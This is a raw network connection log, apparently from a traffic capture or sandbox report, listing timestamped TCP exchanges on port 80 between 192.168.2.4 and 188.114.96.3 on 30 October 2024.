                                                        Oct 30, 2024 05:23:01.308290958 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.569513083 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.620718956 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.684750080 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.685036898 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.690370083 CET8049818188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.690429926 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.690567970 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.690627098 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.692276001 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.696742058 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.697304010 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.697608948 CET8049818188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.702702999 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.702806950 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.702904940 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.708177090 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.755992889 CET8049818188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.058355093 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.063848972 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.167089939 CET8049818188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.167149067 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.297053099 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.339560986 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.602619886 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.651926994 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.725080967 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.725894928 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.730856895 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.731426954 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.731482983 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.731518030 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.731684923 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.737174034 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.089859009 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.095352888 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.343373060 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.386318922 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.642236948 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.642267942 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.642354965 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.783714056 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.789091110 CET8049834188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.789150000 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.789321899 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.794564009 CET8049834188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:04.149643898 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:04.322455883 CET8049834188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:04.384022951 CET8049834188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:04.433182001 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:04.736706972 CET8049834188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:04.776947975 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:04.857258081 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:04.859332085 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:04.860305071 CET4984080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:04.864845037 CET8049834188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:04.864955902 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:04.865643024 CET8049840188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:04.865823984 CET4984080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:04.865916967 CET4984080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:04.871175051 CET8049840188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:05.215023041 CET4984080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:05.220374107 CET8049840188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:05.463927031 CET8049840188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:05.511369944 CET4984080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:05.779983044 CET8049840188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:05.780004978 CET8049840188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:05.780107975 CET4984080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:05.905076027 CET4984080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:05.906034946 CET4984680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:05.910830975 CET8049840188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:05.911020994 CET4984080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:05.911366940 CET8049846188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:05.911443949 CET4984680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:05.911597013 CET4984680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:05.916836977 CET8049846188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:06.261605978 CET4984680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.267008066 CET8049846188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:06.538000107 CET8049846188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:06.589483023 CET4984680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.700112104 CET4984680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.701271057 CET4985280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.706187963 CET8049846188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:06.706258059 CET4984680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.706815004 CET8049852188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:06.706892014 CET4985280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.706988096 CET4985280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.712281942 CET8049852188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:06.822675943 CET4985380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.828007936 CET8049853188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:06.828166008 CET4985380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.828289986 CET4985380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:06.833612919 CET8049853188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.058449984 CET4985280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.063819885 CET8049852188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.063910007 CET8049852188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.183403969 CET4985380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.188869953 CET8049853188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.305577040 CET8049852188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.355102062 CET4985280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.454967976 CET8049853188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.495784998 CET4985380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.516115904 CET8049852188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.558265924 CET4985280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.656579971 CET8049853188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.698919058 CET4985380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.775129080 CET4985280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.775134087 CET4985380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.776163101 CET4985980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.780829906 CET8049852188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.780910969 CET4985280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.781466961 CET8049853188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.781477928 CET8049859188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:07.781533003 CET4985380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.781574965 CET4985980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.781783104 CET4985980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:07.787009954 CET8049859188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:08.136507034 CET4985980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:08.141961098 CET8049859188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:08.382311106 CET8049859188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:08.433235884 CET4985980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:08.702347040 CET8049859188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:08.702375889 CET8049859188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:08.702452898 CET4985980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:08.820205927 CET4986580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:08.825587988 CET8049865188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:08.825659037 CET4986580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:08.825757027 CET4986580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:08.830971956 CET8049865188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:09.183337927 CET4986580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:09.188709974 CET8049865188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:09.423645973 CET8049865188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:09.464524984 CET4986580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:09.620367050 CET8049865188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:09.667615891 CET4986580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:09.741580009 CET4986580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:09.742185116 CET4987380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:09.747107029 CET8049865188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:09.747165918 CET4986580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:09.747519016 CET8049873188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:09.747586012 CET4987380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:09.753035069 CET4987380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:09.758333921 CET8049873188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:10.105279922 CET4987380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:10.110727072 CET8049873188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:10.348525047 CET8049873188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:10.402040005 CET4987380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:10.557111025 CET8049873188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:10.605117083 CET4987380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:10.682826042 CET4987380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:10.683435917 CET4988180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:10.688864946 CET8049881188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:10.688972950 CET4988180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:10.689107895 CET8049873188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:10.689169884 CET4987380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:10.693362951 CET4988180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:10.698669910 CET8049881188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:11.042876005 CET4988180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.048393011 CET8049881188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:11.275542974 CET8049881188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:11.323892117 CET4988180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.467158079 CET8049881188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:11.511418104 CET4988180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.585787058 CET4985980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.588589907 CET4988180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.589730024 CET4988780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.594080925 CET8049881188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:11.594170094 CET4988180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.595021963 CET8049887188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:11.595099926 CET4988780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.595199108 CET4988780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.600481987 CET8049887188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:11.949229956 CET4988780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:11.954690933 CET8049887188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:12.213474035 CET8049887188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:12.261385918 CET4988780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:12.412559986 CET8049887188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:12.412611961 CET8049887188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:12.412729025 CET4988780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:12.528403044 CET4988780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:12.528856039 CET4989380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:12.534213066 CET8049887188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:12.534235001 CET8049893188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:12.534279108 CET4988780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:12.534318924 CET4989380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:12.541177034 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:13.542625904 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:13.585814953 CET8049894188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:13.585832119 CET8049894188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:13.585896015 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:13.585916996 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:13.586055994 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:13.592056036 CET8049894188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:13.933445930 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:13.940237999 CET8049894188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:14.184196949 CET8049894188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:14.230238914 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:14.383826017 CET8049894188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:14.433334112 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:14.506990910 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:14.508126020 CET4990180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:14.512737989 CET8049894188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:14.512826920 CET4989480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:14.513456106 CET8049901188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:14.513545990 CET4990180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:14.513708115 CET4990180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:14.518973112 CET8049901188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:14.870879889 CET4990180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:14.876306057 CET8049901188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:15.111637115 CET8049901188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:15.155872107 CET4990180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:15.310664892 CET8049901188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:15.355144978 CET4990180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:15.431503057 CET4990780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:15.436901093 CET8049907188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:15.436990976 CET4990780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:15.437074900 CET4990780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:15.442337990 CET8049907188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:15.792754889 CET4990780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:15.798260927 CET8049907188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:16.053365946 CET8049907188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:16.105134964 CET4990780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:16.254379988 CET8049907188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:16.254405975 CET8049907188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:16.254544020 CET4990780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:16.362497091 CET4990180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:16.369560003 CET4990780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:16.370523930 CET4991380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:16.375552893 CET8049907188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:16.375614882 CET4990780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:16.375860929 CET8049913188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:16.376051903 CET4991380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:16.376128912 CET4991380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:16.381558895 CET8049913188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:16.730259895 CET4991380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:16.735636950 CET8049913188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:16.983422995 CET8049913188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.027185917 CET4991380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.196800947 CET8049913188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.245755911 CET4991380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.328380108 CET4991380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.329261065 CET4991980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.334026098 CET8049913188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.334074020 CET4991380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.334604025 CET8049919188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.334664106 CET4991980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.334767103 CET4991980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.339977980 CET8049919188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.544343948 CET4992380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.544353008 CET4991980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.549760103 CET8049923188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.549832106 CET4992380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.569257975 CET4992380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.574598074 CET8049923188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.590747118 CET8049919188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.694655895 CET4992580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.699975014 CET8049925188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.700206041 CET4992580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.702641964 CET4992580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.707963943 CET8049925188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.815655947 CET8049919188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.815887928 CET4991980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.919337034 CET4992380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:17.924752951 CET8049923188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:17.924797058 CET8049923188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.058387995 CET4992580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.063764095 CET8049925188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.144242048 CET8049923188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.198988914 CET4992380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.294241905 CET8049925188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.339498043 CET4992580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.474788904 CET8049923188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.482450962 CET8049925188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.527021885 CET4992380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.527245998 CET4992580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.601311922 CET4992380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.601393938 CET4992580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.602379084 CET4993180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.607127905 CET8049923188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.607193947 CET4992380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.607455969 CET8049925188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.607521057 CET4992580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.607741117 CET8049931188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.607806921 CET4993180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.617172956 CET4993180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.622750998 CET8049931188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:18.964659929 CET4993180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:18.969990015 CET8049931188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:19.211685896 CET8049931188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:19.261413097 CET4993180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:19.511055946 CET8049931188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:19.558252096 CET4993180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:19.640667915 CET4993180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:19.641550064 CET4993780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:19.646497011 CET8049931188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:19.646591902 CET4993180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:19.646909952 CET8049937188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:19.646981001 CET4993780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:19.647084951 CET4993780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:19.652435064 CET8049937188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:19.995907068 CET4993780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:20.001375914 CET8049937188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:20.241946936 CET8049937188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:20.292635918 CET4993780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:20.585885048 CET8049937188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:20.585978985 CET8049937188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:20.586030960 CET4993780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:20.710055113 CET4993780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:20.711071014 CET4994480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:20.718555927 CET8049937188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:20.718569994 CET8049944188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:20.718628883 CET4993780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:20.718662977 CET4994480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:20.718799114 CET4994480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:20.724879980 CET8049944188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:21.073975086 CET4994480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:21.079444885 CET8049944188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:21.314237118 CET8049944188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:21.355163097 CET4994480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:21.508055925 CET8049944188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:21.558257103 CET4994480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:21.635021925 CET4995080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:21.641227007 CET8049950188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:21.641319036 CET4995080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:21.641458035 CET4995080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:21.646768093 CET8049950188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:21.997354031 CET4995080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:22.002876997 CET8049950188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:22.244126081 CET8049950188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:22.292675018 CET4995080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:22.604337931 CET8049950188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:22.604512930 CET8049950188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:22.604660034 CET4995080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:22.761954069 CET4994480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:22.768172979 CET4995080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:22.769005060 CET4995980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:22.774197102 CET8049950188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:22.774375916 CET4995080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:22.774429083 CET8049959188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:22.774509907 CET4995980192.168.2.4188.114.96.3
